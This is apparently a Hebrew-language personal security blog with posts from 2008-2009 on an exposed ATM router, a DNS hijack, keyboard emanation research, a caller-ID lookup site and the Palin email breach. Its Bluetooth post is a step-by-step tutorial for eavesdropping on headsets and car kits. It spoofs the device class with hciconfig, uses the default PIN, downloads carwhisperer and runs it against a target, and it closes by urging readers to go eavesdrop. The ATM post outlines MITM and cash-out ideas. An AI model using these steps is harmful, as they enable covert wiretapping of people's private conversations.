יום שישי, 16 בינואר 2009

כספומטים

כחלק מהטיולים שאני מטייל בין לקוחותיי נתקלתי בכספומט למשיכת כסף של חברת שבא.

היה קשה לא להבחין שהכספומט מחובר בעזרת ADSL לנקודה בקיר במבט מאחורי הכספומט
נתקלתי ב - ROUTER מסוג ECI שנמצא בתוך המכונה אך ניתן לגישה עקב הפתחים הגדולים שנמצאים בחלק האחורי של המכונה.

כמה קשה יהיה להתחבר לנקודה ב ROUTER לבצע פעולת MITM- man in the middle attack ולאחר מכן לבצע האזנה על כלל התעבורה העוברת ולתפוס מספרי קוד אישי ותוכן של הפס המגנטי.
או למשל להשתמש ב - Exploit עדכני על הכספומט ולקבל שליטה מוחלטת עליו ולהתחבר לרכיב הוצאת הכסף על ידי חקירת תוכנת המערכת ולהוציא כסף מהכספומט.
או לחילופין להתחבר לכספומטים אחרים שמחוברים לתשתית ה - ADSL שפרוסה ומחברת בין כל הכספומטים למרכז או אפילו חדירה למחשב המרכזי.
מכיוון שאני מהאנשים הטובים ולא הרעים שילכו וינצלו את זה התרעתי והודעתי לחברה על הבעיה ואני מעריך שהנושא יטופל בקרוב.

אבל השאלה הנשאלת היא איך מגיעים למצב כזה ? אני מעריך שיש הרבה חשיבה סביב הנושא בחברות הכספומטים איך פיספסו ? מה אמרו "שם זה לא יקרה" ? מפתיע אבל כנראה שהעולם עדיין לא שם והמודעות עדיין נמוכה בתחום הנ"ל.






יום שישי, 2 בינואר 2009

המלחמה ממשיכה גם ברשת

לא פעם קורה שבזמן מלחמה אמיתית קיימת גם מלחמה ברשת. היום נפרץ שרת DNS ראשי שהחזיק תחתיו מספר לא קטן של חברות גדולות במשק. פעולה זו אפשרה לתוקפים לנתב את המשתמשים לאתר שלהם ולהציג מצג שווא שהאתר נפרץ.
במהלך התקיפה הם ניתבו את משתמשי אתר ynetnews.com ומשתמשי אחד הבנקים הגדולים במשק לאתר שלהם אשר הכיל את דף ה - defacment.
התקפה זו עוררה בי מחשבה קלה כמה זמן הבאג בשרת ה - DNS היה פגיע ומי עוד השתמש בו אולי בעבר להשגת שמות משתמשים וסיסמאות של משתמשי הבנק.

חישבו על התרחיש הבא:
המשתמש מופנה לאתר התוקף הנראה בדיוק כמו האתר של הבנק המותקף בעת הכנסת שם המשתמש
והסיסמא מנותב המשתמש לאתר האמיתי אך הפרטים נשמרים באתר הזדוני.(סוג של Phishing).

נשמע קצת מפחיד זה הזכיר לי בדיקה שעשיתי לפני הרבה שנים ובמהלכה הצלחתי לחדור לנתב של ספק האינטרנט אשר הכיל ניתובים לחצי מדינה.

מה שמלמד שלא משנה כמה ההגנה בבית תהיה חזקה קיימים קישורים לא קטנים למערכות נלוות אשר עלולות להוות סיכון לפעמים מערכות אלו הם בשליטתנו כמו אתר נלווה לאתר הבנק ולפעמים הם של חברה חיצונית כגון גרפי בורסה, פירסומות אשר עלולות לחשוף אותנו לפגיעויות.

להלן תמונת המסך המתקבלת בעת הכניסה:

הערה:חשוב לציין כי לא הבנק ניפרץ ולא YNET אלא שרת ה -DNS השייך לחברה חיצונית

יום שישי, 5 בדצמבר 2008

Bootable Disk On key

רוצים להפוך את ה - Disk On Key שלכם ל - Bootable


טוב ישנם לא מעט שיטות מורכבות יותר ומורכבות פחות לבצע תהליך שכזה אבל השיטה הבאה היא הפשוטה ביותר שאני מכיר.
אז מה עושים?



מורידים את התוכנה הבא:






בנוסף ניתן להוריד את הקבצים הבאים במידה ואתם לא רוצים להשתמש בקבצי המערכת הקיימים:





להלן תמונת מסך של התוכנה:



לאחר מכן יש לסמן את

Create a dos startup disk

וזהו יש לכם Bootable Disk On key תהנו :)

יום חמישי, 4 בדצמבר 2008

PS2 חוקרים הצליחו להאזין מרחוק למקלדת

חוקרים גילו לפני כחודש כי ניתן להאזין למקלדות PS2 ממרחק של כ – 20 מטר, גם כאשר קירות הפרידו בין המקלדת לבין החוקרים.
בעבר בסרטים הינו רואים אנשים יושבים ברכב מסחרי מרוחק ומאזינים למחשבים ברשת. אלו היו סרטים דמיוניים האם עכשיו זה הופך להיות מציאות ?!

כנראה שכן אני מעריך שהרבה ארגוני ביון עובדים עכשיו על אנטנות קטנות יותר המסוגלות לבצע משהו דומה ממרחק הגדול מ – 20 מטר.
עם זאת יש לקחת את הנושא בפרופורציה מכיוון שעל מנת לבצע תהליך שכזה יש להסיר הרבה רעשי רקע אשר יכולים להיגרם מפלאפונים,ספקי כוח, מסכים ועוד.
להלן קישור לאתר החוקרים:




להלן שני הדגמות של החוקרים לנושא האזנה:




Compromising Electromagnetic Emanations of Keyboards Experiment 1/2 from Martin Vuagnoux on Vimeo.




Compromising Electromagnetic Emanations of Keyboards Experiment 2/2 from Martin Vuagnoux on Vimeo.

יום חמישי, 13 בנובמבר 2008

Bluetooth Hacking

תחשבו על הדבר הבא, לכמה ממכם יש אוזנית Bluetooth שנמצאת לידכם או לחילופין מחוברת לאוזן כל הזמן, כמו כן לכמה ממכם יש דיבורית Bluetooth באוטו ?
כאשר הגדרתם את האוזניה בפעם הראשונה נדרשתם להקיש קוד ברירת מחדל כגון:
0000
1234
1111
וכדומה נכון ?
לאחר הקשת הקוד התאפשר לכם להתחבר למכשיר הטלפון ולהשתמש באוזניה לפעילות יום יומית.
אז לאן אני חותר כפי שאתם יודעים קוד זה הוא ברירת מחדל ולא רק אנחנו יודעים עליו אלא גם האקרים שמחפשים סתם להשתעשע או לחילופין לבצע תקיפה ממוקדת.
ובעזרת קוד זה ניתן בדגמים מסוימים (שלא דורשים לחיצה על האוזניה) להתחבר ללא כל בעיה לאוזניה ולבצע תהליך של Pairing שבסופו ניתן להפוך את האוזניה למכשיר ציתות.
נשמע נחמד לא אז איך ניתן לבצע זאת
על מנת לבצע תהליך שכזה דרושים לנו המרכיבים הבאים
מחשב נייד
רכיב Bluetooth
מערכת הפעלה Linux
דרייברים של Bluetooth ו - bluez dev
לאחר שהתקנתם את הדרייברים ניתן לבחון האם ה – Bluetooth עובד בעזרת פקודת


Hcitool scan


פקודה זו תציג לכם את המכשירים אשר יש להם Bluetooth פעיל בקירבתכם.
השלב הבא הוא להפוך את המכשיר שלנו ממחשב למכשיר טלפון, על מנת שהאוזניה תאפשר לנו להתחבר אנו צריכים לגרום לה לחשוב שאנחנו טלפון ולא מחשב.
להלן רשימת הפקודות לביצוע:


Hciconfig hci0 class

פקודה זו מאפשרת לנו לראות כי אנחנו מוגדרים כמצב מחשב


Hciconfig hci0 0x50204

פקודה זו מחליפה את הגדרות ה – Bluetooth כך שיחשבו שהמחשב שלנו הוא מכשיר טלפון


Hciconfig hci0 class


הרצה נוספת של פקודה זו תציג לנו כי מצבנו השתנה וכי אנו מוגדרים כטלפון.


Nano /etc/blutooth/pin => 0000


פקודה זו תאפשר לנו להגדיר את PIN ברירת המחדל של האוזניה.

לאחר סיום ההגדרות יש להוריד את הכלי הבא:
http://trifinite.org/Downloads/carwhisperer-0.2.tar.gz
כלי זה מאפשר לנו להתחבר לאוזניה ולהקליט שמע ממנה (כמו מכשיר ציתות) או לחילופין להשמיע שמע לאוזניה.
הפקודה לביצוע הפעולה היא:


./ Carwhisperer hci0 voiceput.raw voiceget.raw bdaddr_of_target

על מנת לאתר את יעד התקיפה ניתן להשתמש בפקודת


Hcitool scan


ולבחור את יעד התקיפה.

זהו יאללה לכו תצותתו

יום שבת, 1 בנובמבר 2008

שיחה מזוהה

כמה פעמים רציתם לברר מי עומד מאחורי המספר שהתקשר אליכם בזה הרגע, ואותו אינכם מזהים.
בעבר היה אתר בשם 441 שאפשר להכניס את מספר הטלפון ולקבל את פרטי המתקשר.
אך עם הזמן האתר ירד.
עבדכם הנאמן איתר אתר חדש שמאפשר פעולה שכזו.

נ.ב רעיון קטן ל – STARTUP, אפליקציה שיושבת על הטלפון ובכל פעם שמזהה מספר לא מוכר ניגשת בעזרת ה – GPRS לאתר ומציגה את תוצאות החיפוש ישירות לטלפון.
ככה תמיד תדעו מי התקשר:)

להלן הלינק לאתר:

http://441i.com/

יום שבת, 25 באוקטובר 2008

איך פורצים לבחירות



כששרה הצטרפה למקיין, ה FBI שלח אנשים שיאבטחו את איזור הבית שלה, יבדקו ציתותים, וישימו מעקבים צמודים, אך מישהו שכח את המחשב שלה .
שרה פתחה חשבון ב – YAHOO וקראה לו gov.sarah@yahoo.com
מאמר שהתפרסם תחת ה Washington post ציין כי היא מבצעת עבודה דרך שימוש במייל זה.


אני מעריך שזה הדליק נורות אדומות רבות אצל הפורצים.
נמשיך בסיפור, על מנת לא לשכוח את סיסמתה לתיבת הדואר התבקשה שרה לתת שאלה אישית ותשובה.
שרה בחרה בשאלה היכן פגשת את בעלך?
במחקר קטן שערך Hacker חביב באינטרנט בעזרת Google גילה כי היא פגשה את בעלה ב Wasilla high.


תשובה לשאלה הנ"ל אפשרה לו כניסה לחשבון וצפייה בכל הודעות הדואר שלה ואף להתחזות מלאה.
גם ללא הפרטים הנ"ל ושימוש בשאלה קלה ניתן להשיג די בקלות פרטים שכאלה.
לדוגמא על ידי שימוש בהנדסה חברתית.
אנשים לא תמיד זוכרים כי בחרו בתשובה מסוימת אשר משמשת כמפתח רזרבי לתיבת הדואר שלהם ועל ידי שיחת חולין ניתן להגיע למפתח הנ"ל די בקלות.
אז בפעם הבאה שמישהו שואל אתכם תזכירו לי איפה למדתם ביסודי , תחשבו פעמיים לפני שאתם עונים.